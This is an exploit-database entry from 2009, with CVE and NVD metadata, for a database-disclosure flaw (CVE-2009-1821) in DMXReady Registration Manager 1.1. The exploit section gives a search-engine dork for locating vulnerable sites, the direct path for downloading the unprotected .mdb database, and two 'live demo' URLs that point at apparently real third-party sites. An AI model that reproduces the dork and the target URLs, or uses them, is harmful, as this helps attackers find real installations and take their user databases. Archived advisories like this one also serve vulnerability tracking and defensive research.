ID EDB-ID:8705
Type exploitdb
Reporter S4S-T3rr0r!sT
Modified 2009-05-15T00:00:00
Description
DMXReady Registration Manager 1.1 Database Disclosure Vulnerability. CVE-2009-1821. Webapps exploit for asp platform
************************************************** *****************************
# Title : DMXReady Registration Manager 1.1 Remote Database Disclosure Vulnerability
# Author : S4S-T3rr0r!sT
# Contact : l3t@hotmail.com / S4S@n2m3.com
# S.Page : DMXReady CMS Plugin Applications Web Site Design Extensions Dreamweaver ASP Template Database Driven
# Site : WwW.s3curi7y.com / www.h-t.cc
************************************************** *****************************
D0rk : "inurl:inc_webblogmanager.asp"
Exploit :
# http://[target].com/[path]/databases/webblogmanager.mdb
l!ve D3mo :
# http://74.200.213.93/databases/webblogmanager.mdb
# http://www.nomorewar.com/databases/webblogmanager.mdb
V1V4 GaZa
./Done
Thanx To : Cold-Z3ro , HcJ , ViRuSMaN , AlQaYsAr , zAx , Cyb3r-Err0r ,Arabic S3curi7y crew Members, all arabian hacker
# milw0rm.com [2009-05-15]
{"hash": "5b5424200198a13f717e97b759b6af9d649ecfabb15e4be377eb34f39f9a312d", "id": "EDB-ID:8705", "lastseen": "2016-02-01T07:58:24", "enchantments": {"score": {"value": 6.8, "vector": "NONE"}, "vulnersScore": 6.8}, "bulletinFamily": "exploit", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "edition": 1, "history": [], "type": "exploitdb", "sourceHref": "https://www.exploit-db.com/download/8705/", "description": "DMXReady Registration Manager 1.1 Database Disclosure Vulnerability. CVE-2009-1821. Webapps exploit for asp platform", "title": "DMXReady Registration Manager 1.1 Database Disclosure Vulnerability", "sourceData": "************************************************** *****************************\n# Title : DMXReady Registration Manager 1.1 Remote Database Disclosure Vulnerability\n# Author : S4S-T3rr0r!sT\n# Contact : l3t@hotmail.com / S4S@n2m3.com\n# S.Page : DMXReady CMS Plugin Applications Web Site Design Extensions Dreamweaver ASP Template Database Driven\n# Site : WwW.s3curi7y.com / www.h-t.cc\n************************************************** *****************************\n\nD0rk : \"inurl:inc_webblogmanager.asp\"\n\nExploit :\n\n# http://[target].com/[path]/databases/webblogmanager.mdb\n\nl!ve D3mo :\n\n# http://74.200.213.93/databases/webblogmanager.mdb\n# http://www.nomorewar.com/databases/webblogmanager.mdb\n\n\nV1V4 GaZa\n\n./Done\n\nThanx To : Cold-Z3ro , HcJ , ViRuSMaN , AlQaYsAr , zAx , Cyb3r-Err0r ,Arabic S3curi7y crew Members, all arabian hacker\n\n# milw0rm.com [2009-05-15]\n", "objectVersion": "1.0", "cvelist": ["CVE-2009-1821"], "published": "2009-05-15T00:00:00", "osvdbidlist": ["54816"], "references": [], "reporter": "S4S-T3rr0r!sT", "modified": "2009-05-15T00:00:00", "href": "https://www.exploit-db.com/exploits/8705/"}
{"result": {"cve": [{"lastseen": "2017-09-29T14:26:37", "references": ["https://exchange.xforce.ibmcloud.com/vulnerabilities/50915", "https://www.exploit-db.com/exploits/8705", "http://www.vupen.com/english/advisories/2009/1347"], "description": "DMXReady Registration Manager 1.1 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download the database file via a direct request for databases/webblogmanager.mdb.", "edition": 3, "reporter": "NVD", "published": "2009-05-29T12:30:00", "title": "CVE-2009-1821", "type": "cve", "enchantments": {"score": {"modified": "2017-09-29T14:26:37", "vector": "NONE", "value": 5.0}}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2009-1821"], "scanner": [], "modified": "2017-09-28T21:34:34", "cpe": ["cpe:/a:dmxready:registration_manager:1.1"], "id": "CVE-2009-1821", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-1821", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}]}}
